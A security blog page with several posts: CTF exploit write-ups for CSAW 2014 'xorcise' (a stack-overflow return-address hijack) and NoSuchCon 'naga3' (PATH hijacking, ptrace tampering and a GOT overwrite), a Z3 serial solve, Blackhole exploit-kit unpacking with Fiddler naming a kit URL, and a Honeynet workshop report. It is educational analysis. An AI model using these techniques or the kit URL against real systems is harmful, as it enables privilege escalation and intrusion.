dimanche 21 septembre 2014

CSAW 2014 Exploit 500 writeup : xorcise

The CSAW 2014 Exploit500 challenge was a Linux 32-bit network service for which the executable and the source code were provided (I saved a copy of the source code here). The service accepts packets defined by the structure cipher_data and first applies a decryption loop to the received data.

struct cipher_data
{
    uint8_t length;
    uint8_t key[8];
    uint8_t bytes[128];
};
typedef struct cipher_data cipher_data;

The service provides  multiple commands, however the 2 interesting ones, read_file and system, require your packet to be authenticated. The authentication verification is done in is_authenticated() and computes an authentication checksum based on a password read from the local file 'password.txt'. This check does not seem to be vulnerable.

My teammate EiNSTeiN_ discovered that there is a flaw in the decipher() method that does the decryption of the data. The function allocates a buffer buf which will contain the decrypted data, the allocated size is MAX_BLOCKS * BLOCK_SIZE which is 128 bytes. The copy of the packet bytes to the buffer is done safely with memcpy.

#define BLOCK_SIZE 8
#define MAX_BLOCKS 16
[...]
memcpy(buf, data->bytes, sizeof(buf));

There is also a check to ensure that the decryption loop does not process more than the size of the buffer buf[].

    if ((data->length / BLOCK_SIZE) > MAX_BLOCKS)
    {
        data->length = BLOCK_SIZE * MAX_BLOCKS;
    }

But this check is flawed, we can pass a value of 135 which will pass the check (135 / 8 equals 16 which is not bigger than MAX_BLOCKS). The decryption loop is applied by blocks of 8 bytes, so we are able to apply it to 8 bytes outside of buf[].

    for (loop = 0; loop < data->length; loop += 8)
    {
        for (block_index = 0; block_index < 8; ++block_index)
        {
            buf[loop+block_index]^=(xor_mask^data->key[block_index]);
        }
    }

If we look at the stack layout of decipher() we see that those 8 bytes are the variables xor_mask, block_index and the first 3 bytes of loop.

-00000095 buf             db 128 dup(?)
-00000015 xor_mask        db ?
-00000014 block_index     dd ?
-00000010 loop            dd ?

The strategy I went for is to modify the value of loop to make it point on the return address of decipher() and modify it's 2 first bytes to make it return somewhere else. Hopefully we can find an interesting place to jump to.

Let's go through the modification of the bytes one at a time. The first one is xor_mask. At this point block_index equals 0. We know 2 of the values in the decryption (xor_mask = 0x8F and buf[loop+block_index] = 0x8F), so we can set key[block_index] to get the output value we want, let's set xor_mask to 0 to make the next steps easier. 0x8F ^ 0x8F ^ 0x00 equals 0x00, so this is the value we will put at key[0].

variable          : prev_val   block_index  new_val key_value    
xor_mask       : 0x8F       0            0x00    key[0] = 0x00     

Next up is the first byte of block_index, at this point it is equal to 1. We will keep it's value at 1 so the decryption loop continues normally. As we have modified xor_mask to 0x00, the computation is now 0x01 ^ 0x01 ^ 0x00 which equals 0x00, we put this value in key[1]. We will also leave the other bytes of block_index unchanged. Here is the status of our table so far :

variable : prev_val block_index new_val key_value xor_mask : 0x8F 0 0x00 key[0] = 0x00 block_index[0] : 0x01 1 0x01 key[1] = 0x00 block_index[1] : 0x00 2 0x00 key[2] = 0x00 block_index[2] : 0x00 3 0x00 key[3] = 0x00 block_index[3] : 0x00 4 0x00 key[4] = 0x00

We can now modify the first byte of loop. It's current value is 0x80 (128), the value we need to make buf[loop+block_index] modify the return address at this point is 0x93, so that will give us key[5] = 0x13.

variable       : prev_val   block_index  new_val key_value  
loop[0]        : 0x80       5            0x93    key[5] = 0x13 

We are now able to modify the return address of decipher(), we're making good progress. So where do we want to make the program jump? There is a call to read_file()in process_connection(), this command reads the content of a file and sends its content back to us, we could use it to read the content of 'password.txt'.

.text:08049279                 mov     eax, [ebp+var_10]
.text:0804927C                 add     eax, 8
.text:0804927F                 sub     esp, 8
.text:08049282                 push    eax
.text:08049283                 push    offset aReadFileReques ; "Read File Request: %s\n"
.text:08049288                 call    _printf
.text:0804928D                 add     esp, 10h
.text:08049290                 mov     eax, [ebp+var_10]
.text:08049293                 add     eax, 8
.text:08049296                 sub     esp, 8
.text:08049299                 push    eax             ; filename
.text:0804929A                 push    [ebp+fd]        ; fd
.text:0804929D                 call    read_file

There is a little detail to keep in mind, there is a stack adjustment after the call to decipher(), as we are hijacking the return address the stack will not be properly readjusted.

.text:0804918F                 call    decipher
.text:08049194                 add     esp, 10h
;274     packet = (request *)&decrypted;
.text:08049197                 lea     eax, [ebp+var_11D]

.text:0804919D                 mov     [ebp+var_10], eax

My first thought was to jump at 0804928D which does the same stack adjustment and then sets the correct parameters for the call to read_file(). However this approach does not work as the value of var_10 is set only after the call to decipher(). Bummer.

I then noticed that the address of filename is passed via eax at 0x08049299 and it happens that at the end of decipher() eax points inside buf[]. So the last thing I needed to do was to adjust the initial packet content so that it contained 'password.txt\x00' XOR 0x8F XOR the key. Here is the final content of the variable smashing table.

variable       : prev_val   block_index  new_val key_value    
xor_mask       : 0x8F       0            0x00    key[0] = 0x00        
block_index[0] : 0x01       1            0x01    key[1] = 0x00 
block_index[1] : 0x00       2            0x00    key[2] = 0x00
block_index[2] : 0x00       3            0x00    key[3] = 0x00
block_index[3] : 0x00       4            0x00    key[4] = 0x00
loop[0]        : 0x80       5            0x93    key[5] = 0x13
at this point buf[loop+block_index] overwrites retaddr

retaddr[1]     : 0x94       6            0x99    key[6] = 0x0d
retaddr[2]     : 0x91       7            0x92    key[7] = 0x03

And below is the source code of my exploit, I used the pwntools python library by Gallopsled which saved me a ton of time for other challenges, definitely check it out.

And finally the exploit in action :

[ekse@xubuntu] : ~/csaw/exploit500 $ python client.py 
[+] Opening connection to 127.0.0.1 on port 24001: OK
[*] Switching to interactive mode
pass123
[*] Got EOF while reading in interactive

So the password was 'pass123', I was kind of depressing to have worked so much for such a weaksauce password, the CSAW CTF organizers really are a bunch of trolls. Now we could implement the packet authentication and call the system command to list the files on the server, but I guessed the flag was probably in 'flag.txt' and used the exploit to read that file instead :-)

The flag was flag{code_exec>=crypto_break}.

Thanks to drraid for this great challenge to the CSAW organizers for such a great CTF!

dimanche 10 août 2014

Solving picoCTF 2013 Harder Serial with Z3

In the past weeks I have been watching LiveCTF, a project to livestream speedruns of wargames and CTF challenges. This is a great learning tool as you get to see the thought process of the caster as well as the tools and tricks they use to solve the challenges. 

I also recently learned about picoCTF, a capture the flag game made for high school teams organized by PPP.  I have been playing the 2013 edition in the last few days and it is actually really well made, for someone new to CTF I would definitely recommend starting with this one. It also has interesting challenges even for seasoned CTF players, you can play the 2013 edition by registering here.

I decided to try to speedrun picoCTF and focus on optimizing my work process when going through the challenges. In this post I will show how to solve the 'Harder Serial' challenge using Z3.



The challenge
Harder Serial comes in the form of a Python script, we need to find a working serial for the RoboCorpIntergalactic software. The full script code is below.

As we can see the program expects a 20 digits serial and the check_serial() function checks a number of conditions on the values of the digits with simple operations. It probably can be solved by hand but it is a perfect use case for Z3. In short, Z3 is an open-source theorem prover than allows us to define conditions to be met and will output if the conditions are satisfiable as well a set of values that meet all those conditions. The inner workings of Z3 and SMT solvers are a complex topic but Z3 itself is actually easy to use.

I will now go through my solution code, if you prefer to see the full script you can find it here. Z3 uses its own syntax but luckily there are Python bindings which will make it easy to define the conditions. We start by importing z3 and defining integer variables for the serial digits.

Then we create an instance of the solver and add our conditions to it. The first set of conditions define the serial digits as values between 0 and 9.

Then we add the conditions from the serial_check() function. To save time I used a couple of search and replace in a text editor to avoid typing them manually.

We add a condition to make s[3] different than zero because one of the conditions divides by it, Z3 will accept 0 as a valid value but Python will throw an exception. Finally we call solver.check() which will determine if the solver is able to meet the conditions and solver.model() which will return a set of values that meet those conditions.

>python break_serial.py
solving...
sat
[s[8] = 5,
 s[4] = 3,
 s[19] = 2,
 s[17] = 8,
 s[16] = 8,
 s[2] = 8,
 s[9] = 7,
 s[1] = 2,
 s[3] = 1,
 s[15] = 7,
 s[11] = 0,
 s[10] = 9,
 s[12] = 3,
 s[18] = 1,
 s[0] = 4,
 s[14] = 5,
 s[7] = 4,
 s[6] = 2,
 s[5] = 7,
 s[13] = 9]

Again with a bit of search/replace and some python we can get our serial.
>>> s = [0] * 20
>>> s[8] = 5
>>> s[4] = 3
>>> s[19] = 2
>>> s[17] = 8
>>> s[16] = 8
>>> s[2] = 8
>>> s[9] = 7
>>> s[1] = 2
>>> s[3] = 1
>>> s[15] = 7
>>> s[11] = 0
>>> s[10] = 9
>>> s[12] = 3
>>> s[18] = 1
>>> s[0] = 4
>>> s[14] = 5
>>> s[7] = 4
>>> s[6] = 2
>>> s[5] = 7
>>> s[13] = 9
>>> "".join([str(x) for x in s])
'42813724579039578812'

We validate that our key is accepted :

> python harder_serial.py 42813724579039578812
Please enter a valid serial number from your RoboCorpIntergalactic purchase
#>42813724579039578812<#

Thank you! Your product has been verified!


This was a rather simple use of Z3, for examples of advanced use of Z3 for reverse engineering see the following articles:

Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution by Axel Souchet and
Concolic execution - Taint analysis with Valgrind and constraints path solver with Z3 by Jonathan Salwan.

As always feel free to leave a comment or send me a message on Twitter if you have questions or comments!

mercredi 19 juin 2013

Writeup for naga3 @ NoSuchCon CTF 2013

This is a writeup for the naga3 challenge that was part of the NoSuchCon 2013 CTF. I picked this challenge for the Montréhack session I was hosting this month as I found it quite interesting and a bit different than the challenges I did in the past. Montréhack is an informal group that gathers every month to practice CTF challenges and the solution is presented at the end; if you live in the Montreal area feel free to drop by, it's a lot of fun and a great way to learn. For the purpose of this article I will use the challenge environment I recreated for the event, the paths are different than on the CTF server but I used the original binary.

The challenges are accessible at OverTheWire so if you want to try it by yourself first you should stop reading now.

The original description of the challenge was "To monitor local system performance, a tool was developed to take some timing measurements by executing some commands." The first step was to find the binary. Searching for files owned by naga3 shows a program called rtv. rtv is SUID on user naga3. (To simplify things, I put the program and source code directly in /home/level2/ on my VM for Montréhack.)


naga2@naga:/$ find . -user naga3

./usr/lib/rtv.c
./usr/lib/rtv

We now have access to the binary and the source code of the program. As rtv.c is actually quite short, I reproduce it here.


Review of rtv.c


Let's examine the main() function first. We see that a pipe is created [1], then a child process is created with fork [2]. In the child process, the SETUID privileges are dropped [3] and then the process is made debuggable with ptrace via the call to prtcl(PR_SET_PTRACER) [4]. Finally, we see that the parent and child process execute functions that have to do with "measurements" and each uses one side of the pipe [5]. We can assume that information will be passed between both processes.

Figure 1 - main function of rtv

The call to prctl() with PR_SET_PTRACER has a big impact here. Ptrace allows us to read and modify memory of the process, set breakpoints and modify register values (including EIP). The end result is that the code of the child is now irrelevant, we can replace it with whatever we want. This is something we will put to use later on.

Systematic failure


We then inspect the functions that are called in the child process. The first one is make_measurements(). This function iterates over the entries defined in the Measurement table [1] (see Figure 3). This table contains measurement_t structures which contains commands. Those commands are executed via system() [2], the output is redirected to /dev/null. Finally the function the execution time of the commands in the runtime member of the structure in the Measurements table.

Figure 2 - vulnerable call to system() in make_measurements


Figure 3 - The Measurements table

As we can see, the commands that are called are defined with relative paths. This is classic vulnerability on UNIX systems. To exploit this, we simply need to modify the PATH environment variable to add a folder that we control at the beginning and create an executable file (a shell script works just fine) for one of the commands in it (for example env in this case). The result will be that our executable will be called instead of the intended one.

However, in this case this is not sufficient to read the flag. As the calls to system() are made by the child process, the SETUID privileges have already been dropped by then. It does however allow us to easily retrieve the pid of the child process as it is put in the PARENTPID variable when the commands are called. This will be of great importance in the next part. (Note : on the original CTF server, /proc/ was disabled, probably to avoid snooping between competitors. The PARENTPID variable was thus needed).

Let's talk


The last part of the program is where the child process returns the measurement data to the parent process which in turn prints it to the standard output  via print_measurements().

We see that report_measurements() iterates over the Measurement table with a for loop and writes 1) i, the index in the table and 2) runtime, the execution time of the executed command.

Figure 4 - report_measurements() in the child process
The same thing is done in read_measurements() in the parent process, however it is done slightly differently. The function enters in a while loop and reads the data provided in the pipe, if the size of the reads don't correspond to the expected size the program stops execution there [1]. The runtime information is then written in the Measurements table of the parent process, the loop ends when i is equal to the last index of the table (measurementCount - 1). 

Normally this would be fine if we expect the child to behave correctly. However, due to our ability to use ptrace on the child process and modify the data written in the pipe, we can cause  a write outside of the Measurements table [2]. We will also control 8 bytes at every write, since we control i we can make as many writes as we want.

Figure 5 - read_measurements() in the parent process


Arbitrary write? not quite


We now know that we can cause memory overwrites in the address space of the parent memory. But where exactly can we write? Figure 6 shows the assembly code from IDA corresponding to the Measurements[i].runtime = t; statement in read_measurements(). 0x0804100 is the address of the first runtime entry in the Measurements table. Then i is multiplied by 0x88 which is the size of the measurement_t structure (128 bytes for cmd + 8 bytes for runtime).

Figure 6 - Memory overwrites in read_measurements()
The multiplication is somewhat obscured as it optimized with shift-left instructions, each shift multiplies by 2.

shl eax,   3; eax = i * 8
mov ebx, eax; ebx = i * 8 
shl ebx,   4; ebx = i * 8 * 16 = i * 128
add eax, ebx; eax = i * 8 + i * 128 = i * 136 (136 equals 0x88)


The write address can be determined with the following formula :

       writeAddr = 0x804A100 + i * 0x88

If you are lucky enough to have a license for it, Hexrays Decompiler actually provides the formula directly.

Figure 7 - writeAddr formula in Hexrays Decompiler

We now need to find one or may memory address(es) to overwrite to hijack the control flow of the program. The GOT (Global Offset Table) is usually a good candidate. It can be dumped with the command objdump -R rtv.


level2@montrehack:~$ objdump -R rtv

rtv:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a32c R_386_COPY        stderr
0804a00c R_386_JUMP_SLOT   setresuid
0804a010 R_386_JUMP_SLOT   read
0804a014 R_386_JUMP_SLOT   printf
0804a018 R_386_JUMP_SLOT   gettimeofday
0804a01c R_386_JUMP_SLOT   __stack_chk_fail
0804a020 R_386_JUMP_SLOT   getuid
0804a024 R_386_JUMP_SLOT   perror
0804a028 R_386_JUMP_SLOT   fwrite
0804a02c R_386_JUMP_SLOT   getpid
0804a030 R_386_JUMP_SLOT   puts
0804a034 R_386_JUMP_SLOT   system
0804a038 R_386_JUMP_SLOT   __gmon_start__
0804a03c R_386_JUMP_SLOT   exit
0804a040 R_386_JUMP_SLOT   __libc_start_main
0804a044 R_386_JUMP_SLOT   write
0804a048 R_386_JUMP_SLOT   getgid
0804a04c R_386_JUMP_SLOT   prctl
0804a050 R_386_JUMP_SLOT   pipe
0804a054 R_386_JUMP_SLOT   fork
0804a058 R_386_JUMP_SLOT   sprintf
0804a05c R_386_JUMP_SLOT   setresgid

Inspecting the code of the program reveals the functions read, printf and exit might be called after memory corruption, being able to overwrite the entry of one those should allow us to redirect execution.

A naive approach would be to calculate the write addresses for each value of i. This can be done with the following script :



While this approach will find a result, it is very slow. A better approach is to take into account the fact that the value of writeAddr grows by 0x88 each time i is increased. We can bring back writeAddr around the area of the address we are targeting by increasing i so that it cycles over the 32 bit address space. To obtain this value, we divide 0xFFFFFFFF by 0x88 which gives us 31 580 641. Then it's just a matter of adjusting i upward or downward until we are between 0x88 bytes of our target address. We have now saved 31 580 640 useless computations, that's  a nice optimization :-)

The script actually executes instantly, provided that our target address is near the base address 0x0804A100 which is the case for the GOT. Here is a part of the output for read.

ekse@montrehack:~/level2$ python map_address.py
i = -0000001 writeaddr =  0804a078 diff = 104
i = 01e1e1e1 writeaddr =  0804a088 diff = 120
i = 03c3c3c2 writeaddr =  0804a010 diff = 0
i = 05a5a5a3 writeaddr =  08049f98 diff = 120
i = 07878785 writeaddr =  08049fa8 diff = 104
i = 09696967 writeaddr =  08049fb8 diff = 88
i = 0b4b4b49 writeaddr =  08049fc8 diff = 72
i = 0d2d2d2b writeaddr =  08049fd8 diff = 56
i = 0f0f0f0d writeaddr =  08049fe8 diff = 40
i = 10f0f0ef writeaddr =  08049ff8 diff = 24
i = 12d2d2d1 writeaddr =  0804a008 diff = 8
i = 14b4b4b2 writeaddr =  08049f90 diff = 128
i = 16969694 writeaddr =  08049fa0 diff = 112
i = 18787876 writeaddr =  08049fb0 diff = 96
i = 1a5a5a58 writeaddr =  08049fc0 diff = 80
i = 1c3c3c3a writeaddr =  08049fd0 diff = 64
i = 1e1e1e1c writeaddr =  08049fe0 diff = 48
i = 1ffffffe writeaddr =  08049ff0 diff = 32
i = 21e1e1e0 writeaddr =  0804a000 diff = 16
i = 23c3c3c1 writeaddr =  08049f88 diff = 136
i = 25a5a5a3 writeaddr =  08049f98 diff = 120
i = 27878785 writeaddr =  08049fa8 diff = 104
i = 29696967 writeaddr =  08049fb8 diff = 88
i = 2b4b4b49 writeaddr =  08049fc8 diff = 72
i = 2d2d2d2b writeaddr =  08049fd8 diff = 56
i = 2f0f0f0d writeaddr =  08049fe8 diff = 40
i = 30f0f0ef writeaddr =  08049ff8 diff = 24
....

We can see that by using an i value of 03c3c3c2 we are able to overwrite read directly.


rtvtrace.py - ptrace to my heart


I wrote a script using python-ptrace to modify the values of i and runtime that are sent in the pipe by the child process. To go faster, I actually used the Gdb implementation provided with the library which allows to easily create breakpoints and modify memory and registry values.

The code is actually quite simple. It sets 2 breakpoints, one before the write of i in the pipe and the second before the write of runtime. In each case eax points to the data that will be written, we simply  point it to another address with our own supplied data. Note that in this debugger, breakpoint are removed after being hit so they will be executed only for the first command. To test that it works, we overwrite the address of read in the GOT with 0x41424344.

The setup of our exploit will be as follow :

  1. Create an env script that writes PARENTPID to a file  named "pid"
  2. run PATH=.:$PATH rtv
  3. run rtvtrace.py and attach to the child process

Here is the output of rtvtrace.py when executed.


ekse@montrehack:~/level2/$ ./run_rtvtrace.sh
Waiting for pid...
Switch to
[!] attached to 1188
New breakpoint:
New breakpoint:
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1191 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1199 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1201 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1203 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
Stopped at
EIP: 0x80487d6L
Current id loc: 0xbff5295cL value : (0,)
Changing data location for write of id...
Stopped at
EIP: 0x8048802L
Process 1188 exited normally
Unhandled exception : None

And sure enough, when running rtv in GDB execution ends up at 0x44434241.

ekse@montrehack:~/level2/exploit_1$ ./run_level2.sh

(gdb) run
Starting program: /home/level2/rtv
Command runtime verification tool v1.0
Please wait while command runtimes are being verified...

Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()

(gdb) bt
#0  0x44434241 in ?? ()
#1  0x080489d5 in read_measurements ()
#2  0x08048bdc in main ()

Where do we put our shellcode?

We now have control of the execution of the parent process. The last thing we need to do is to figure where to put our shellcode and jump to it. A technique is often use when doing this kind of challenge is to put the shellcode in an environment variable, prepend a large nopsled in front of it and jump somewhere in it. However this approach does not work as the stack is defined as non-executable, which we can confirm with execstack.

ekse@montrehack:~/level2/exploit_1$ execstack /home/level2/rtv
- /home/level2/rtv

If we look at the output of the map_address.py script, we see that we can have multiple consecutive writes of 8 bytes so we should probably be able to write a short shellcode somewhere. The problem we are facing is that none of the memory section of rtv is both writeable and executable.

Figure 8 - Permissions of the memory segments of rtv


Another approach would be to use a ROP payload to set the memory region where we put our shellcode executable, but that is somewhat complicated and I'm lazy so I kept looking for an easier way. I reviewed what could be overwritten in the memory and thought about the commands in the Measurements table. We could probably overwrite one of the commands and have it execute what we want, but that doesn't work either as it's the commands in the child address space that are executed... and then it all became clear.


All we need to do is to redirect execution to make_measurements() so that it is executed in the parent process. This way we can use another command that is called by system() (I used md5sum) to copy the flag. The final setup of our exploit is like this :


  1. env is a script that writes PARENTPID to the file "pid"
  2. md5sum is a script that copies the flag to the file "flag"
  3. run PATH=.:$PATH rtv
  4. attach to the child process with rtvtrace.py
  5. Overwrite the address of the read() function in the GOT with the address of make_measurements()
  6. md5sum is called by the parent process, we win.

You can find the code of the exploit and the scripts I presented on my github repository. The slides I made for Montréhack are also available.

Conclusion

This challenge required the use of 3 different vulnerabilities of the program. Each of those taken separately was not sufficient to exploit the program. This is something that is often needed today to bypass modern protection mechanisms, for example one of the winners of Pwn2Own last year used 6 vulnerabilities to exploit Google Chrome.

As I write these lines, I just learned about a new vulnerability in FreeBSD that was disclosed today and that involves ptrace and mmap. While the context is completely different, it's funny to see that the exploit code is actually simpler than what we had to do =) 

If you have questions or would like something to be clarified in the post, feel free to email me at ekse.0x@gmail.com. Happy hacking!




vendredi 3 mai 2013

Unpacking exploit kits with Fiddler

Most exploit kits use javascript packing to avoid the code appearing in plain text. Figure 1 shows an example of such a packed script. Multiple techniques and tools exist to help in the task of unpacking and analyzing these kits, for example Kahu Security has many articles on his blog about this. This post presents a quick and dirty method I have been using a lot recently; it uses Fiddler and its AutoResponder feature. The idea is to modify the Javascript code and then replay the HTTP traffic in the browser. If you want to try this technique, here is the Fiddler HTTP archive I used as an example (archive password is "infected").

Figure 1 Packed Blackhole Exploit kit
The first step involves capturing the kit with Fiddler. Then activate the AutoResponder feature as shown in Figure 2. Next drag the sessions corresponding the kit traffic in the AutoResponder panel. In this example  this is the first session.

Figure 2 Enabling AutoResponder
Next edit the session, you can use the context menu or just press Enter.


Figure 3 Editing the response

Now I want to modify the script to be able to see the unpacked code so I open the Syntax View tab. This part is different from one pack to another and you might need multiple attempts to figure out the best way to do it. In this example the pack is Blackhole, there is an eval statement at the end very end that executes the script after it is unpacked.I use console.log to get the content, so I replace w(c) by console.log(c) and hit Save.

Figure 4 Deciding what to modify

Next I open Google Chrome (make sure it is configured to use Fiddle as a proxy), open the Developer Console with F12 and click on the Console tab. I then browse to the pack URL, in this example http://energirans.net/main.php?page=598991e7306ac07e (you can use Ctrl+U to copy the URL from a session). If all went well the unpacked code should appear in the logs.

Figure 5 unpacked script in the logs
Another neat feature of Fiddler is the code beautifier. I copy the script from the log, replace the original script in the SyntaxView and click on Format Script/JSON. The code is now well formatted and ready for analysis.You can find the unpacked code here. Note that this is an old version of Blackhole v1 from February 2012 but the technique still works today.

Figure 6 Format Javascript code


Figure 7 Formatted Blackhole code

This is a quick and dirty technique and could easily be defeated but it works with many packs. If you have any question leave a comment or email me at ekse.0x@gmail.com.








mercredi 30 mars 2011

Honeynet Workshop 2011

Note : This is a cross-post from the Corelan Team blog.

Introduction

March 21th I was in Paris for the annual Honeynet Workshop. For the first time this year there was a conference day accessible to the general public. Moreover, I didn't have to pay the registration fee since I successfully completed one of the Honeynet Forensics challenges. The day was split in 4 sessions and had talks covering the Honeynet projects, malware, and ethical and legal considerations of tracking botnets and eventual take-downs.

There was also a CTF taking place during the day so I didn't take as much notes as I wanted, this is also  why I will not be covering all the talks in this article.
All the slides are available here : http://www.honeynet.org/node/626


R&D in Honeynet Project by David Watson

P1000761The first talk presented some of the current Honeynet projects. Through the years the Honeynet Project has been a major player in the domain of botnet tracking with the release of numerous open-source honeypots and articles on the subject.
Hopefully, projects are still very active in part with the help of the Google Summer of Code for which the Honeynet Project is a mentoring organization. By the way, if you are a full-time university student and would like to be paid to work on some kickass open-source software, the Honeynet project was selected again this year and the application period starts March 28th.

As a quick reminder, an important concept with honeypots is the distinction between high-interaction and low-interaction honeypots.
Low-interaction means that the honeypot is not relying on the original system but is emulating it. High-interaction honeypots usually are implemented as addons, for example through a kernel module, that tracks the internal changes to the system.

Both approaches have their advantages, low-interaction is usually safer since it is emulating the system being attacked and is thus not vulnerable to the flaws in that system. It usually scales better since it is emulating only the parts needed and thus requires less resources, as opposed to high-interaction
honeypots that often require a complete virtual machine.
On the other side, high-interaction honeypots are better at discovering unknown flaws (0days).  Depending on the complexity of the target system, the implementation of a high-interaction honeypot might take less time than writing an emulation stack for it.

The first project presented by David was Dionanea, a low-interaction honeypot that aims to replace Nepenthes which is a popular Honeynet software. The fact that is it using Python makes it easier to extend than Nepenthes which was written in C++. It is integrating libemu for automated shellcode detection. Also, it has a SQL interface which make it easier to query the results as opposed to parsing the log files.

The second project David talked about is Sebek. It is a high-interaction honeypot which integrates in the kernel of Windows. It currently uses SSDT hooking for tracing which is a technique used by rootkits (proof that techniques and knowledge is not malicious by itself).

David mentioned they want to change the hooking to inline kernel modifications to make it stealthier. The replacement version of this project is called Qebek it uses QEMU and relies on breakpoint to monitor events, making it possible for example to see the keystrokes on the system as they happen. I don't know if the authors of this software are aware of the fact that the project name sounds a lot like Québec which is the state where I come from (and also the name of a project which you will learn about in the upcoming weeks/months, stay tuned!).

Another Honeynet project is Capture-HPC which is a client-side honeypot (ie browsers) that uses VMware. The fact that it relies on virtual machines make it hard to scale. That's where PhoneyC comes in. It is written in Python and supports personalities to modify the behaviour of the browser. It uses Spidermonkey as the Javascript engine and also has support to mock ActiveX controls. It also uses libemu like Dionanea for shellcode detection. Later during the day Angelo Dell'Aera, the author of the software, mentioned that he is actually working to switch to the V8 javascript engine (the one used in Chrome) since Spidermonkey has a very limited API which makes it hard to extend.

Finally, Glastopf is a web honeypot that emulates a web server and is useful to detect vulnerabilities like RFI, LFI, SQL injection. The author of the project Lukas Rist did a little live demonstration of his tool running on one of his webservers and we could see attacks coming in every few seconds.
As you can see there are a lot of great honeypots being developed by the Honeynet project, make sure you have a look at them.



Efficient Analysis of Malicious Bytecode Linespeed Shellcode Detection and Fast Sandboxing by Georg 'oxff' Wicherski

In this talk, Georg presented a shellcode detection library he designed and explained some its inner working. He started with a quick overview of what shellcodes are and how they are made position-independent via a GetPC sequence.

Apart from the traditional call-pop sequence which is the standard one, he also mentioned the use of floating point instructions, namely fnop and fnstenv to get the current address, a technique I wasn't aware of.

Georg then explained the differences between two current approaches for shellcode detection, namely statistical methods and pattern matching. Statistical methods rely on the likelihood of a sequence of instructions to exist in or outside shellcode, kind of like bayesian filters work to detect spam. This method requires training and is also false negative and false positive prone.

For these reasons, Georg preferred to implement a method based on GetPC sequence identification and then emulation of the instructions preceding the GetPC sequence to remove false positives.

Georg implemented this in a library named libscizzle. It uses libemu for emulation. Since one of the project goals was performance, It also uses sandboxed hardware execution to make it faster.

Georg mentioned that he successfully used this library in CTFs (Defcon, RuCTFe). The library is available for download here in the form of a pre-compiled shared object (Unix DLL equivalent) some header files and a little test application, the source code is not available.


High Performance Packet Sniffing by Tillmann Werner

In this talk Tillman explained the design and the need for two tools he wrote : multicap and streams.

multicap is a tool to do high-performance packet sniffing to avoid dropped packets. To increase performance, Tillman used a ring-buffer to reduce memory allocations. He also used the PF_PACKET socket which has the advantage of already including the timestamp in the packet, removing the need to call the localtime() function for every packet. Finally multicap uses memory-mapped files to dump the packets which should increase performance. Tillman did a quick demo of his tool. A comparison of the performance with existing tools like tcpdump and dumpcap would have been nice.

The second tool is streams. It does TCP stream reassembly for a packet trace (pcap file), in a similar way to the "Reassemble TCP Stream" feature of Wireshark. multicap is interactive and makes it possible to filter or search the streams.

Both tools are open-source and available here :


Basics of Honeyclients by Angelo Dell'Aera and Christian Seifert

This talk was dealing with two complementary subjects : the rise of client-side attacks and the tools developed by the Honeynet project to detect those attacks. As I already talked a bit about PhoneyC and Capture-HPC in the first section of this article, I will focus mostly on the second part of the talk.

Since a couple of years already there is a shift in attacks to client-side applications (browsers, Flash, Adobe Reader, Java etc.). Keeping client applications and all associated plugins up to date is a challenge for a lot of users and entreprises and as Christian mentioned, client applications are driven by end-users which remain the weakest-link of the security chain.

The talk then explained how cyber-criminals are using the web to distribute malware via Malware Distribution Networks. Christian presented a diagram taken from Microsoft Security Intelligence Threat report which I found really interesting.
mdn
Source: Microsoft Security Intelligence Threat Report (http://www.microsoft.com/sir)

The attacks generally use multiple layers of servers.
The first one consists of compromised web servers (often via unpatched vulnerabilities in popular applications) which links to another server, most of the time via injected iframes.  That second server, known as the redirector, will embed or redirect to another server which contains an exploit kit. If one of the exploit succeeds, it will download and install some malware from yet another server.

Generally a lot of infected sites point to the same exploit server, the quantity of traffic diverted to them determines their effectiveness. Having multiple legitimate servers linking to a redirector also increase it's ranking in search engines and can be further increased via SEO campaigns.


Microsoft estimates that 2.8% of exploit servers are responsible for 84% of drive-by-download. What is particularly noteworthy is the fact that the infection links usually remain active for only a few days or even hours; by the time the links are flagged as malicious by lists such as Google SafeBrowsing or McAfee SiteAdvisor they are often already inactive. This also makes the task harder for security companies to retrieve the malicious content. The use of Javascript obfuscation is further complicating the task of researchers.



Spy VS Spy : Countering SpyEye with SpyEye by Lance James

The last talk of the day dealt with SpyEye, a botnet kit which generated a lot of buzz lately since it is supposedly merging with ZeuS.

SpyEye is a kit cyber-criminals can buy for around 1000 to 3000 US$. It is customizable and comes with modules to steal credit card numbers and credentials via formgrabbing in browsers, harvesting of credentials for FTP, POP etc. ... in summary it's pretty nasty. It also comes with a web panel where crooks can see the bots they are controlling and the information they gathered.


Lance then explained that in the current version, a lot of files on the C&C server are world-readable via the AJAX interface, including debug logs, configuration files and SQL backups. When connecting via the web panel a password is requested, an although Lance had the password from the SQL backup it would be illegal for him to connect in the USA. However, it is possible to connect a local SpyEye instance to a remote server (proxy mode) with no authentication whatsoever. Another advantage of this technique is that the botnet information is updated in the web panel in real-time. Pretty neat :)

Lance also presented statistics regarding the botnet he tracked. It was discovered in October 2010 and infected 28,590 unique computers. When you consider the quantity of information that was probably stolen during such a short period of time and the potential economical gain, it is not hard to understand why cybercrime is so popular.

The question of laws and ethics also came in this talk. Lance repeated numerous time that we are at a point where "Defense is dead" and we need to gain visibility. There is an increase in aggressive attacks on big companies, government and even security firms (think HBGary). The threat is growing exponentially and diversifying into politically oriented stuff. Other attendees joined the discussion and there was evident frustration and discontent with the fact that researchers need to combat adversaries that have no respect of the laws and ethic principles and stay for most of them out of reach of the legal system, while the researchers need to subject themselves to high standard of ethics (especially with regards to privacy) and evaluate their every moves to make sure they are not putting themselves in legal trouble.

I really had a good time attending the Honeynet Workshop, it was great to have a glimpse of the Honeynet Project from the inside.

lundi 8 novembre 2010
